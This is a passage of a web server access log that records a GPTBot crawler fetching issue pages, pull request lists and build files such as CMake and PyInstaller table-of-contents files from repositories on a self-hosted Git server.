-[17/Feb/2026:18:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:18:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9942] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:18:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fPostgresWatchdog.spec" [Client 74.7.227.38] [Length 19945] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:18:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog" [Client 74.7.227.38] [Length 46262] [Gzip 12.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:18:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9920] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:18:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:18:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&state=closed&type=all" -[17/Feb/2026:18:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11636] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18927] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:18:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18937] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11635] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:18:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja?display=source" [Client 74.7.227.38] [Length 16433] [Gzip 5.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:18:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11635] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18941] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11636] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11636] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18926] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11639] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18936] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18937] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja?display=source" [Client 74.7.227.38] [Length 16433] [Gzip 5.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:18:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 44086] [Gzip 15.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 70856] [Gzip 17.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:18:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 69302] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18937] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11634] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:18:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18927] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:18:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:18:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11390] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11416] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:33:50 +0000] - 200 200 - GET https 